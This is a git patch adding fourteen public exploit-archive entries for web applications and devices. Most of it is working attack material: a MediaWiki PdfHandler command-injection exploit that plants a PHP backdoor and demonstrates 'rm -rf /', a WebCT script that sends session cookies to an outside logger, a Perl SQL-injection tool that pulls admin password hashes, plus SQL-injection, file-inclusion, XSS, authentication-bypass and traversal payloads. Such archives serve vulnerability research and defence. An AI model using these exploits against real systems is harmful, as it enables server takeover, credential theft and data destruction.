From 8a34f6a372c6199a07575af007f7585faf8c7276 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 3 Feb 2014 04:26:33 +0000
Subject: [PATCH] Updated 02_03_2014

---
 files.csv                             |  14 ++
 platforms/bsd/dos/31333.txt           |  16 +++
 platforms/hardware/remote/31340.html  |   9 ++
 platforms/hardware/remote/31342.txt   |  14 ++
 platforms/multiple/webapps/31329..txt | 183 ++++++++++++++++++++++++++
 platforms/php/webapps/31331.txt       |   7 +
 platforms/php/webapps/31332.txt       |   7 +
 platforms/php/webapps/31334.txt       |   7 +
 platforms/php/webapps/31335.txt       |   7 +
 platforms/php/webapps/31336.txt       |   9 ++
 platforms/php/webapps/31337.txt       |  95 +++++++++++++
 platforms/php/webapps/31339.txt       |  10 ++
 platforms/php/webapps/31341.txt       |   9 ++
 platforms/php/webapps/31344.pl        |  60 +++++++++
 platforms/windows/remote/31345.txt    |   9 ++
 15 files changed, 456 insertions(+)
 create mode 100755 platforms/bsd/dos/31333.txt
 create mode 100755 platforms/hardware/remote/31340.html
 create mode 100755 platforms/hardware/remote/31342.txt
 create mode 100755 platforms/multiple/webapps/31329..txt
 create mode 100755 platforms/php/webapps/31331.txt
 create mode 100755 platforms/php/webapps/31332.txt
 create mode 100755 platforms/php/webapps/31334.txt
 create mode 100755 platforms/php/webapps/31335.txt
 create mode 100755 platforms/php/webapps/31336.txt
 create mode 100755 platforms/php/webapps/31337.txt
 create mode 100755 platforms/php/webapps/31339.txt
 create mode 100755 platforms/php/webapps/31341.txt
 create mode 100755 platforms/php/webapps/31344.pl
 create mode 100755 platforms/windows/remote/31345.txt

diff --git a/files.csv b/files.csv
index fcf14d17e..624d4db31 100755
--- a/files.csv
+++ b/files.csv
@@ -28135,3 +28135,17 @@ id,file,description,date,author,platform,type,port
 31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
+31329,platforms/multiple/webapps/31329..txt,"MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)",2014-02-01,@u0x,multiple,webapps,0
+31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module 'pid' Parameter SQL Injection Vulnerability",2008-03-04,"Aria-Security Team",php,webapps,0
+31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module 'fileName' Parameter Local File Include Vulnerability",2008-03-04,The-0utl4w,php,webapps,0
+31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' Local Denial of Service Vulnerability",2008-03-04,sipherr,bsd,dos,0
+31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart 'p' Parameter SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0
+31335,platforms/php/webapps/31335.txt,"MG2 'list' Parameter Cross-Site Scripting Vulnerability",2008-03-04,"Jose Carlos Norte",php,webapps,0
+31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 'set_permissions.php' Cross-Site Scripting Vulnerability",2008-03-05,ZoRLu,php,webapps,0
+31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0
+31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0
+31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x Login Page Cross-Site Scripting Vulnerability",2008-03-06,"Henri Lindberg",hardware,remote,0
+31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 'index.php' Remote File Include Vulnerability",2008-03-06,THE_MILLER,php,webapps,0
+31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0
+31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module 'kid' Parameter SQL Injection Vulnerability",2008-03-06,r080cy90r,php,webapps,0
+31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 Directory Traversal Vulnerability",2008-03-06,"Luigi Auriemma",windows,remote,0
diff --git a/platforms/bsd/dos/31333.txt b/platforms/bsd/dos/31333.txt
new file mode 100755
index 000000000..5abbd9f27
--- /dev/null
+++ b/platforms/bsd/dos/31333.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/28090/info
+
+BSD PPP is prone to a local denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Attackers can leverage this issue to crash the application and deny service to legitimate users. Given the nature of the issue, arbitrary code execution may also be possible, but this has not been confirmed.
+
+This issue affects FreeBSD 6.3 and unspecified versions of NetBSD and OpenBSD; other versions may also be affected. 
+
+~/~/~/~/~/~/~/~/~/~/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+xxxxxxxxx
+
diff --git a/platforms/hardware/remote/31340.html b/platforms/hardware/remote/31340.html
new file mode 100755
index 000000000..ae3de53d3
--- /dev/null
+++ b/platforms/hardware/remote/31340.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28116/info
+
+Check Point VPN-1 UTM Edge is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects Check Point VPN-1 UTM Edge firmware 7.0.48x.
+
+<html> <body onload="document.f.submit()"> <form name="f" method="post" action="http://192.168.10.1" style="display:none"> <input name="user" value="'<script/src=//l7.fi></script>"> </form> </body> </html>
\ No newline at end of file
diff --git a/platforms/hardware/remote/31342.txt b/platforms/hardware/remote/31342.txt
new file mode 100755
index 000000000..511cae6fd
--- /dev/null
+++ b/platforms/hardware/remote/31342.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/28122/info
+
+Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface.
+
+An attacker can exploit this issue to gain unauthorized access to the affected device and make arbitrary changes to its configuration. This may lead to further attacks.
+
+POST /process_adv/ HTTP/1.1
+Host: 10.0.0.1
+Keep-Alive: 300
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+
+DialogText=&Advanced=1 
\ No newline at end of file
diff --git a/platforms/multiple/webapps/31329..txt b/platforms/multiple/webapps/31329..txt
new file mode 100755
index 000000000..7b1a43383
--- /dev/null
+++ b/platforms/multiple/webapps/31329..txt
@@ -0,0 +1,183 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+####################################################################
+#
+# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
+# Reported by Netanel Rubin - Check Point’s Vulnerability Research Group (Jan 19, 2014)
+# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
+# Affected website : Wikipedia.org and more !
+#
+# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
+# Release dates : Feb 1, 2014
+# Special Thanks to 2600 Thailand !
+#
+####################################################################
+
+# Exploit:
+####################################################################
+1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
+http://vulnerable-site/index.php/Special:Upload
+2. inject os cmd to upload a php-backdoor
+http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20
+"<?php%20system(\\$_GET[1]);">images/xnz.php`
+3. access to php-backdoor!
+http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
+4. happy pwning!!
+
+
+# Related files:
+####################################################################
+thumb.php <-- extract all _GET array to params
+/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width
+options
+/includes/media/ImageHandler.php
+/includes/GlobalFunctions.php
+/includes/filerepo/file/File.php
+
+# Vulnerability Analysis:
+####################################################################
+1. thumb.php
+This script used to resize images if it is configured to be done
+when the web browser requests the image
+<? ...
+1.1 Called directly, use $_GET params
+wfThumbHandleRequest();
+1.2 Handle a thumbnail request via query parameters
+function wfThumbHandleRequest() {
+$params = get_magic_quotes_gpc()
+? array_map( 'stripslashes', $_GET )
+: $_GET; << WTF
+
+wfStreamThumb( $params ); // stream the thumbnail
+}
+1.3 Stream a thumbnail specified by parameters
+function wfStreamThumb( array $params ) {
+...
+$fileName = isset( $params['f'] ) ? $params['f'] : ''; // << puts
+uploaded.pdf file here
+...
+// Backwards compatibility parameters
+if ( isset( $params['w'] ) ) {
+$params['width'] = $params['w']; // << Inject os cmd here!
+unset( $params['w'] );
+}
+...
+$img = wfLocalFile( $fileName );
+...
+// Thumbnail isn't already there, so create the new thumbnail...
+$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image
+by width/height
+...
+// Stream the file if there were no errors
+$thumb->streamFile( $headers );
+...
+?>
+2. /includes/filerepo/file/File.php
+<? ...
+function transform( $params, $flags = 0 ) { ...
+$handler = $this->getHandler(); // << PDF Handler
+...
+$normalisedParams = $params;
+$handler->normaliseParams( $this, $normalisedParams );
+...
+$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
+..
+?>
+3. /extensions/PdfHandler/PdfHandler_body.php
+<? ...
+function doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {
+...
+$width = $params['width'];
+...
+$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &
+parameters
+$cmd .= " -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}
+-dLastPage={$page}";
+$cmd .= " -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q ". wfEscapeShellArg(
+$srcPath );
+$cmd .= " | " . wfEscapeShellArg( $wgPdfPostProcessor );
+$cmd .= " -depth 8 -resize {$width} - "; // << FAILED to escape shell
+argument
+$cmd .= wfEscapeShellArg( $dstPath ) . ")";
+$cmd .= " 2>&1";
+...
+$err = wfShellExec( $cmd, $retval );
+...
+?>
+4. /includes/GlobalFunctions.php
+Execute a shell command, with time and memory limits
+<? ...
+function wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =
+array() ) {
+...
+passthru( $cmd, $retval ); // << Execute here!!
+
+# Proof-Of-Concept
+####################################################################
+GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C
+php%20system(\\$_GET[1]);%22%3Eimages/longcat.php`
+HTTP/1.1
+Host: 127.0.0.1
+Connection: keep-alive
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8
+Cookie: my_wikiUserID=2; my_wikiUserName=Longcat;
+my_wiki_session=op3h2huvddnmg7gji0pscfsg02
+
+<html><head><title>Error generating thumbnail</title></head>
+<body>
+<h1>Error generating thumbnail</h1>
+<p>
+?????????????????????????????: /bin/bash: -: command not found<br />
+convert: option requires an argument `-resize' @
+error/convert.c/ConvertImageCommand/2380.<br />
+GPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />
+
+</p>
+
+</body>
+</html>
+
+
+GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
+Host: 127.0.0.1
+Connection: keep-alive
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: en-US,en;q=0.8
+Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;
+my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+# Back-end $cmd
+####################################################################
+GlobalFunctions.php : wfShellExec()
+cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150
+-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
+'/usr/bin/convert' -depth 8 -resize 10|`echo "<?php
+system(\\$_GET[1]);">images/longcat.php` -
+'/tmp/transform_0e377aad0e27-1.jpg') 2>&1
+
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.4.14 (GNU/Linux)
+
+iQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU
+BzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf
+ny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1
+mijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2
+uCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb
+GO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv
+n2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh
+FXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt
+vuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ
+M0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan
+kumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR
+2LmeyQR2rzjBB7Sovvcn
+=ooEs
+-----END PGP SIGNATURE-----
diff --git a/platforms/php/webapps/31331.txt b/platforms/php/webapps/31331.txt
new file mode 100755
index 000000000..005a340be
--- /dev/null
+++ b/platforms/php/webapps/31331.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28088/info
+
+The eGallery module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?name=eGallery&file=index&op=showpic&pid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202 
\ No newline at end of file
diff --git a/platforms/php/webapps/31332.txt b/platforms/php/webapps/31332.txt
new file mode 100755
index 000000000..5f0211b5d
--- /dev/null
+++ b/platforms/php/webapps/31332.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28089/info
+
+The PHP-Nuke 'Seminars' module is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized remote user to view files and execute local scripts in the context of the webserver process.
+
+http://www.example.com/autohtml.php?filename=../../../../../../../../../../../../../../../etc/passwd 
\ No newline at end of file
diff --git a/platforms/php/webapps/31334.txt b/platforms/php/webapps/31334.txt
new file mode 100755
index 000000000..b48b0ed79
--- /dev/null
+++ b/platforms/php/webapps/31334.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28096/info
+
+Mitra Informatika Solusindo Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?c=10&p=-7%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/31335.txt b/platforms/php/webapps/31335.txt
new file mode 100755
index 000000000..6dbf71479
--- /dev/null
+++ b/platforms/php/webapps/31335.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28098/info
+
+MG2 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/31336.txt b/platforms/php/webapps/31336.txt
new file mode 100755
index 000000000..17c0fc22a
--- /dev/null
+++ b/platforms/php/webapps/31336.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28106/info
+
+Podcast Generator is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Podcast Generator 0.96.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/podcastgen-0.96.2/setup/set_permissions.php?scriptlang="><script>alert("XSS")</script
\ No newline at end of file
diff --git a/platforms/php/webapps/31337.txt b/platforms/php/webapps/31337.txt
new file mode 100755
index 000000000..ad82e4921
--- /dev/null
+++ b/platforms/php/webapps/31337.txt
@@ -0,0 +1,95 @@
+source: http://www.securityfocus.com/bid/28107/info
+
+WebCT is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+This issue affects WebCT 4.1.5.8; other versions may also be vulnerable. 
+
+WebCT 4.x Javascript Session Stealer Exploits
+
+Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/)
+Affected Version: 4.1.5.8
+Discoverer: Benjamin "balupton" Lupton
+Date Discovered: November 2005
+Date Reported: 25/06/2007
+Software Author Contacted (again) on: 20/07/2007
+Date Published: 05/03/2008
+
+Published At:
+http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit
+http://www.balupton.com/documents/webct_exploits.txt
+http://seclists.org/fulldisclosure/2008/Mar/0051.html
+
+Attack Type:
+Javascript Session Stealer Exploit.
+
+Description:
+Mail & Discussion Board messages are not properly checked for javascript, allowing javascript to perform a session stealing attack (allowing the attacker to be logged in as the victim).
+
+Tested On:
+Attacks were tested fully on eCentral TAFE&#039;s WebCT System in November 2005 (with permission of staff),
+and again on Curtin University&#039;s WebCT System in June 2006 (but this time only to see if the javascript will run).
+
+Action Taken:
+Contacted TAFE lecturers and administrators, who didn&#039;t really care.
+Contacted WestOne multiple times, but never recieved any response.
+Then contacted Secunia, which would not publish as the discoverer did not own their own copy of the software in question.
+Published as WebCT is being phased out, with Blackboard being the replacement.
+
+Steps:
+The attacker publishes the exploit code in a message with "Don&#039;t wrap text" enabled.
+The victim accesses the attacker&#039;s message and their cookies are sent to the attacker&#039;s remote logger.
+The attacker then logs into the system and replaces his/her cookies with the acquired cookies.
+- Cookies are formatted as follows within the "value" attribute: CookieName=CookieValue; NextCookieName=NextCookieValue;
+The attacker is now logged into the system as the victim.
+In this case the logger is located here: http://www.balupton.com/sandbox/logger.php?pass_code=secret_key
+
+Notes:
+Victims must be students (attack does not work on non students, eg. teachers/admins).
+Attack 2 will also run in Opera, but fails to retrieve the document.cookie value.
+Attack 2 uses a base64 encoded javascript which is executed.
+Both attacks can be customized to allow any javascript to run.
+Javascript can also be developed to post a mail or discussion board message, this works for all types of victims.
+
+Resources:
+Attack Code: See below
+Logger: http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_key&show_source=true
+Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php
+Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In
+
+Attack 1 - IE6SP2 Exploit (Automatic):
+<div id="mycode" style="BACKGROUND: url(&#039;java
+script:eval(document.all.mycode.expr)&#039;)" expr="// balupton&#039;s javascript session stealer automatic hack
+	var iframe = document.createElement(&#039;iframe&#039;);
+	iframe.style.border = &#039;none&#039;;
+	iframe.style.height = &#039;1px&#039;;
+	iframe.style.width = &#039;1px&#039;;
+	var url =
+		&#039;http&#039;+&#039;://www.balupton.com/sandbox/logger.php&#039;
+		+&#039;?variable=document.cookie&#039;
+		+&#039;&value=&#039;+escape(document.cookie)
+		+&#039;&url=&#039;+escape(document.location)
+		+&#039;&pass_code=secret_key&#039;
+		;
+	iframe.src = url;
+	document.body.appendChild(iframe);">Thank you</div>
+
+
+Attack 2 - Firefox Exploit (Manual):
+<a href="data:text/html;base64,PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLy8gYmFsdXB0b24ncyBqYXZhc2NyaXB0IHNlc3Npb24gc3RlYWxlciBtYW51YWwgaGFjaw0KdmFyIHVybCA9DQoJJ2h0dHA6Ly93d3cuYmFsdXB0b24uY29tL3NhbmRib3gvbG9nZ2VyLnBocCcNCgkrJz92YXJpYWJsZT1kb2N1bWVudC5jb29raWUnDQoJKycmdmFsdWU9Jytlc2NhcGUoZG9jdW1lbnQuY29va2llKQ0KCSsnJnVybD0nK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlciA/IGRvY3VtZW50LnJlZmVycmVyIDogJ2h0dHA6Ly9leHBsb2l0ZWRfdXJsLmNvbScpDQoJKycmcGFzc19jb2RlPXNlY3JldF9rZXknDQoJOw0KZG9jdW1lbnQubG9jYXRpb24gPSB1cmw7DQo8L3NjcmlwdD4=">Click Me!</a>
+
+Attack 2 - Firefox Exploit (Manual) - Decoded:
+<script type="text/javascript">
+// balupton&#039;s javascript session stealer manual hack
+var url =
+	&#039;http://www.balupton.com/sandbox/logger.php&#039;
+	+&#039;?variable=document.cookie&#039;
+	+&#039;&value=&#039;+escape(document.cookie)
+	+&#039;&url=&#039;+escape(document.referrer ? document.referrer : &#039;http://exploited_url.com&#039;)
+	+&#039;&pass_code=secret_key&#039;
+	;
+document.location = url;
+</script>
+
+
diff --git a/platforms/php/webapps/31339.txt b/platforms/php/webapps/31339.txt
new file mode 100755
index 000000000..4aa374a55
--- /dev/null
+++ b/platforms/php/webapps/31339.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28109/info
+
+The Yellow_Pages module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects the Yellow_Pages 1; other versions may also be vulnerable.
+
+http://www.example.com/modules.php?name=Yellow_Pages&file=viewdir&cid=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
+
diff --git a/platforms/php/webapps/31341.txt b/platforms/php/webapps/31341.txt
new file mode 100755
index 000000000..49e9a4b6e
--- /dev/null
+++ b/platforms/php/webapps/31341.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28120/info
+
+Yap Blog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Versions prior to Yap Blog 1.1.1 are vulnerable. 
+
+http://www.example.com/[path]/index.php?page=[Sh3llAddress] 
\ No newline at end of file
diff --git a/platforms/php/webapps/31344.pl b/platforms/php/webapps/31344.pl
new file mode 100755
index 000000000..808514aea
--- /dev/null
+++ b/platforms/php/webapps/31344.pl
@@ -0,0 +1,60 @@
+source: http://www.securityfocus.com/bid/28126/info
+
+The KutubiSitte module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+#!/usr/bin/perl use Getopt::Std;
+use LWP::UserAgent;
+
+sub usg{
+printf("
+
+
+  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+  |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |
+  -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-
+ #######################################################
+ # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #
+ #######################################################
+<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->
+#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
+#:-------------------------------------------------------:#
+:#|                    USAGE:                           |#:
+:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:
+#:-------------------------------------------------------:#
+#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
+#:-------------------------------------------------------:#
+:#|                   EXAMPLE:                          |#:
+:#|  exploit.pl -h http://site.com -p /php-nuke/ -U 1   |#:
+#:-------------------------------------------------------:#
+#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#
+
+
+");
+}
+sub problem{
+   print "\n\n[~] SITO NON VULNERABILE [~]\n\n";
+   exit();
+}
+sub exploitation{
+      $conn = LWP::UserAgent -> new;
+   $conn->agent('Checkbot/0.4 ');
+   $query_pwd =
+$host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%
+2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";
+   $return_pwd = $conn->get($query_pwd) || problem();
+   $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();
+   print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";
+  }
+
+getopts(":h:p:U:",\%args);
+    $host = $args{h} if (defined $args{h});
+    $path = $args{p} if (defined $args{p});
+    $user_id= $args{U}if (defined $args{U});
+        if (!defined $args{h} || !defined $args{p} || !defined $args{U}){
+       usg();
+    }
+    else{
+       exploitation();
+    }
diff --git a/platforms/windows/remote/31345.txt b/platforms/windows/remote/31345.txt
new file mode 100755
index 000000000..09d5310d3
--- /dev/null
+++ b/platforms/windows/remote/31345.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28127/info
+
+MicroWorld eScan Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting this issue allows an attacker to access arbitrary files outside of the FTP server root directory. This can expose sensitive information that could help the attacker launch further attacks.
+
+eScan Server 9.0.742.98 is vulnerable to this issue; other versions may also be affected.
+
+ftp://SERVER:2021//windows/win.ini 
\ No newline at end of file